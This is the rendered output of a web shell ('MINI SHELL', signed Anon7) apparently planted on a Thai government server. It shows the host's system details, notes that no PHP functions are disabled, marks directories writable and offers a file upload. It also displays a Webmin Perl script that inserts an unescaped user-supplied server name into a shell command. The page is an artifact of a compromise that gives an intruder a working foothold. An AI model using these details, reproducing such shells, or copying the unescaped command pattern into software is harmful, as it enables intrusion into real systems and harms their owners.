MINI SHELL

Server : Apache/2.2.2 (Fedora)
System : Linux App1.pathumtani.go.th 2.6.20-1.2320.fc5smp #1 SMP Tue Jun 12 19:40:16 EDT 2007 i686
User : apache ( 48)
PHP Version : 5.2.9
Disable Function : NONE
Directory :  /usr/libexec/webmin/mount/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : //usr/libexec/webmin/mount/smb_share.cgi
#!/usr/bin/perl
# smb_share.cgi
# Displays a list of shares available on some host

require './mount-lib.pl';
&ReadParse();
&header(&text('smb_choose2', $in{'server'}));
print <<EOF;
<script>
function choose(f)
{
top.opener.ifield.value = f;
window.close();
}
</script>
EOF

&execute_command("$config{'smbclient_path'} -d 0 -L $in{'server'} -N",
		 undef, \$out, \$out);
if ($?) {
	print "<b>",&text('smb_elist2', $in{'server'}),"</b>\n";
	exit;
	}
elsif ($out =~ /Unknown host/) {
	print "<b>",&text('smb_ehost', $in{'server'}),"</b>\n";
	exit;
	}
elsif ($out =~ /error connecting|connect error/) {
	print "<b>",&text('smb_edown', $in{'server'}),"</b>\n";
	exit;
	}

if ($out =~ /Sharename\s+Type\s+Comment\n((.+\n)+)/) {
	@shlist = split(/\n/, $1);
	foreach $sh (@shlist) {
		if ($sh =~ /^\s+(.{1,7}\S+)\s+Disk\s*(.*)$/) {
			push(@names, $1); push(@comms, $2);
			}
		}
	}
if (@names) {
	print "<b>$text{'smb_sel2'}</b><br>\n";
	print "<table border width=100%>\n";
	print "<tr $tb> <td><b>$text{'smb_share'}</b></td> ",
	      "<td><b>$text{'smb_comment'}</b></td> </tr>\n";
	for($i=0; $i<@names; $i++) {
		print "<tr $cb> <td><a href=\"\" ",
		      "onClick='choose(\"$names[$i]\"); ".
		      "return false'>$names[$i]</a></td>\n";
		printf "<td>%s</td> </tr>\n",
			$comms[$i] =~ /\S/ ? $comms[$i] : "<br>";
		}
	print "</table>\n";
	}
else {
	print "<b>",&text('smb_noshares', $in{'server'}),"</b>\n";
	}

&popup_footer();


Anon7 - 2021